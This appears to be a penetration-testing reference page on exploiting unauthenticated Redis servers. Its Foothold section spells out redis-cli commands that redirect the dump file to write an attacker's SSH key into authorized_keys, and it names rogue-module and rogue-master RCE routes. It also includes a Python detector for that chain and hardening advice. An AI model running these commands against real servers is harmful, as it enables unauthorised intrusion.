CACHE / STORE 6379/tcp

Redis

aka redis-server

In-memory key-value store on 6379, frequently exposed with no authentication. CONFIG SET turns it into an arbitrary file-write primitive (SSH keys, webshells, cron).

Ports

Port | Proto | Notes
6379 | tcp   | Redis server, often unauthenticated

Fingerprint

  • PING returns +PONG, INFO leaks version and config
  • CONFIG GET dir returns the data directory (no error = no auth)

Key files

Path                                | Holds                                            | Sensitive
/etc/redis/redis.conf               | bind address and requirepass (if set)            | sensitive
/var/lib/redis/                     | default data dir, also the default dump location |
/var/lib/redis/.ssh/authorized_keys | classic write target for a foothold              |

Default / weak creds

  • no auth by default; requirepass sometimes set in redis.conf

Service users

redis

Known CVEs

CVE           | Impact
CVE-2022-0543 | Lua sandbox escape on Debian/Ubuntu packaging, unauthenticated RCE

Exploitation primitives

  • CONFIG SET dir + CONFIG SET dbfilename + SAVE writes an RDB file anywhere the redis user can: SSH key into ~/.ssh/authorized_keys, webshell into the web root, or a cron job into /var/spool/cron
  • MODULE LOAD a malicious .so (redis-rogue-server) for direct RCE on 4.x/5.x
  • Replication-based RCE (slaveof a rogue master) on some versions

Overview

Redis is an in-memory data store on 6379. When it answers without a password, any client can read/write keys and, crucially, change where Redis writes its dump file, which makes it a clean arbitrary file-write primitive.

Enumeration

Is it alive (expect +PONG):

redis-cli -h <TARGET> ping

Version:

redis-cli -h <TARGET> info server

Data directory (a clean answer confirms no auth):

redis-cli -h <TARGET> config get dir

Foothold (file write)

Point Redis at the .ssh directory:

redis-cli -h <TARGET> config set dir /var/lib/redis/.ssh

Name the dump file:

redis-cli -h <TARGET> config set dbfilename authorized_keys

Load your public key into a value:

cat key.txt | redis-cli -h <TARGET> -x set ssh_key

Write it to disk:

redis-cli -h <TARGET> save

Pad the public key with blank lines so OpenSSH parses it past the RDB metadata. Other targets: a webshell into the web root, or a cron entry for code exec.
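Detection-side counterpart to the chain above, added here as an example and not part of the original page: it parses the line format printed by redis-cli monitor and flags, per client, a CONFIG SET dir or dbfilename followed by SAVE/BGSAVE, as well as MODULE LOAD and SLAVEOF/REPLICAOF. The sample stream, client addresses and paths are constructed.

```python
import re
from collections import defaultdict

# Line format printed by `redis-cli monitor`:
#   <unix ts> [<db> <client ip:port>] "CMD" "arg" ...
MONITOR_RE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

def parse_line(line):
    """Return (client, [args]) for one MONITOR line, or None if it does not parse."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return m.group(3), ARG_RE.findall(m.group(4))

def detect_rogue_writes(lines):
    """Flag, per client, CONFIG SET dir/dbfilename followed by SAVE, plus MODULE LOAD and replication takeover."""
    alerts = []
    pending = defaultdict(dict)  # client -> {"dir": ..., "dbfilename": ...}
    for line in lines:
        parsed = parse_line(line)
        if not parsed or not parsed[1]:
            continue
        client, args = parsed
        cmd = args[0].upper()
        sub = args[1].upper() if len(args) > 1 else ""
        if cmd == "CONFIG" and sub == "SET" and len(args) >= 4:
            key = args[2].lower()
            if key in ("dir", "dbfilename"):
                pending[client][key] = args[3]
        elif cmd in ("SAVE", "BGSAVE") and pending.get(client):
            p = pending.pop(client)
            alerts.append(f"{client}: RDB dump redirected to "
                          f"{p.get('dir', '<unchanged>')}/{p.get('dbfilename', '<unchanged>')}")
        elif cmd == "MODULE" and sub == "LOAD":
            alerts.append(f"{client}: MODULE LOAD {args[2] if len(args) > 2 else '?'}")
        elif cmd in ("SLAVEOF", "REPLICAOF") and sub != "NO":
            alerts.append(f"{client}: replication pointed at {' '.join(args[1:])}")
    return alerts

# Constructed sample stream: a legitimate app client, then a client running
# the dir/dbfilename/SAVE chain from the section above and a module load.
SAMPLE = """\
1700000000.100000 [0 10.0.0.20:40001] "SET" "session:abc" "1"
1700000001.200000 [0 10.0.0.99:51234] "CONFIG" "SET" "dir" "/var/lib/redis/.ssh"
1700000002.400000 [0 10.0.0.99:51234] "CONFIG" "SET" "dbfilename" "authorized_keys"
1700000003.500000 [0 10.0.0.99:51234] "SET" "ssh_key" "\\n\\nssh-ed25519 AAAAexample\\n\\n"
1700000004.600000 [0 10.0.0.99:51234] "SAVE"
1700000005.700000 [0 10.0.0.99:51234] "MODULE" "LOAD" "/tmp/module.so"
""".splitlines()
```

Feed it a live stream with `redis-cli monitor | python3 -c '...'` only on instances where the MONITOR overhead is acceptable; the benign app client in the sample produces no alert.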

Hardening

Set requirepass, bind to localhost, and enable protected-mode and ACLs.
